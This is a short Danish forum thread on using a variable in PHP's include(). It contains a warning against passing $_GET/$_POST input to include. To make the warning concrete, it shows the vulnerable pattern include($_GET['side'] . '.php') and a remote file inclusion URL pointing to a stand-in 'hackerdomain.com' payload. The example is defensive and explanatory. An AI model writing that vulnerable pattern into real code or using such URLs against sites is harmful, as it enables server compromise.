Kan man include en variable?

Det kan du sagtens.
<?php
$minfil = "fil.php";
include($minfil);
?>

Ah..

Fejlen var: <?php include('$frontpage_info'); ?>
skulle være: <?php include($frontpage_info); ?>

Ja, når du bruger en variabel i en funktion, skal den altid indsættes uden '' omkring sig. Den slags er kun til tekst-strenge.

HUSK HUSK HUSK!

ALDRIG at bruge nogen form for bruger input - $_GET/$_POST/$_REQUEST/$_COOKIE etc i dine include/require.
Især hvis fopen_wrappers er enabled.

Jeg overtog på et tidspunkt en hjemmeside, hvor der pludselig begyndte at ligge ukendte mapper og filer på serveren.

Det viste sig at navigationen på siden var baseret på noget i stil med

include($_GET['side'] . '.php');

Så kan du forestille dig hvad der sker hvis man skriver

http://mitdomain.dk/index.php?side=http://hackerdomain.com/skadeligkode.php?a=

og skadeligkode.txt indeholder (i dette tilfælde uskadelig kode)

<?php phpinfo(); ?>

-> #4 - smart ;)

Ja det tog også lidt tid før jeg opdagede hvor det lå begravet.
Det var kun fordi jeg brugte flere timer i access-log'en at jeg fandt ud af det!

Det mest indlysende er jo at skifte FTP pass osv.